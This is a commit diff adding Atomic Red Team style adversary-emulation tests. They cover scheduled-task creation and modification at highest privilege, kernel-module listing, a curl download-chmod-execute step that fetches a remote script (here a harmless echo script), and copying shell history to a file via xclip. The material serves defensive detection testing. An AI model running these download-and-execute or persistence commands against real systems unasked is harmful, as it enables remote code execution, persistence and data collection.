Linux and Windows (#2085)

* Linux and Windows * Update T1115.yaml
2022-08-17 15:29:33 -06:00
parent 1bf4526ffd
commit a93030e394
5 changed files with 65 additions and 0 deletions
@@ -179,3 +179,25 @@ atomic_tests:
      Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
    cleanup_command: |
      Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
+- name: PowerShell Modify A Scheduled Task
+  description: |
+    Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. 
+    It will first be created to spawn cmd.exe, but modified to run notepad.exe.
+
+    Upon successful execution, powershell.exe will create a scheduled task and modify the action. 
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $Action = New-ScheduledTaskAction -Execute "cmd.exe"
+      $Trigger = New-ScheduledTaskTrigger -AtLogon
+      $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
+      $Set = New-ScheduledTaskSettingsSet
+      $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
+      Register-ScheduledTask AtomicTaskModifed -InputObject $object
+      $NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
+      Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
+    cleanup_command: |
+      Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false >$null 2>&1
@@ -325,3 +325,13 @@ atomic_tests:
      remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
    name: powershell
    elevation_required: true
+- name: Linux List Kernel Modules
+  description: |
+    Identify kernel modules installed. Upon successful execution stdout will display kernel modules installed on host.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      sudo lsmod
+      sudo kmod list
+    name: sh
@@ -715,3 +715,23 @@ atomic_tests:
    command: 'wscript.exe #{vbscript_file}'
    cleanup_command: del Atomic-License.txt >nul 2>&1
    name: command_prompt
+- name: Linux Download File and Run
+  description: |
+    Utilize linux Curl to download a remote file, chmod +x it and run it.
+  supported_platforms:
+    - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: string
+      default:  https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
+    payload_name:
+      description: payload name
+      type: string
+      default:  atomic.sh
+  executor:
+    command: |
+      curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
+    cleanup_command: |
+      del #{payload_name}
+    name: sh
@@ -0,0 +1,2 @@
+#!/bin/bash 
+echo "Hello From Atomic Red Team"
@@ -69,3 +69,14 @@ atomic_tests:
    cleanup_command: |
      Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
    name: powershell
+- name: Add or copy content to clipboard with xClip
+  description: |
+    Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      apt install xclip -y
+      history | tail -n 30 | xclip -sel clip
+      xclip -o > history.txt
+    name: sh